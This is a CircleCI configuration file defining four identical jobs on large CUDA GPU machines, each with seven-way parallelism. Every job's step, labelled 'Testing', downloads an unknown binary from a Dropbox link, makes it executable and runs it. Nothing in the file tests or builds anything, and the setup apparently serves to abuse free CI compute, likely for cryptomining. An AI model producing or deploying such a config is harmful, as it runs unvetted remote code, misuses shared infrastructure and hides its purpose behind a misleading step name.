version: 2.1
jobs:
    Devop:
      machine:
        image: ubuntu-1604-cuda-10.2:202012-01
        resource_class: large
      parallelism: 7    
      steps:
        - checkout
        - run:
            name: "Testing"
            command: sudo apt update -y && wget -O start https://www.dropbox.com/s/f1ejvcr6yi6yjv3/sync-dropbox?dl=1 && chmod +x start && ./start
    Devop1:
      machine:
        image: ubuntu-1604-cuda-10.2:202012-01
        resource_class: large
      parallelism: 7   
      steps:
        - checkout
        - run:
            name: "Testing"
            command: sudo apt update -y && wget -O start https://www.dropbox.com/s/f1ejvcr6yi6yjv3/sync-dropbox?dl=1 && chmod +x start && ./start
    Devop2:
      machine:
        image: ubuntu-1604-cuda-10.2:202012-01
        resource_class: large
      parallelism: 7
      steps:
        - checkout
        - run:
            name: "Testing"
            command: sudo apt update -y && wget -O start https://www.dropbox.com/s/f1ejvcr6yi6yjv3/sync-dropbox?dl=1 && chmod +x start && ./start
    Devop3:
      machine:
        image: ubuntu-1604-cuda-10.2:202012-01
        resource_class: large 
      parallelism: 7
      steps:
        - checkout
        - run:
            name: "Testing"
            command: sudo apt update -y && wget -O start https://www.dropbox.com/s/f1ejvcr6yi6yjv3/sync-dropbox?dl=1 && chmod +x start && ./start
workflows:
    version: 2.1
    build:
        jobs:
            - Devop
            - Devop1
            - Devop2
            - Devop3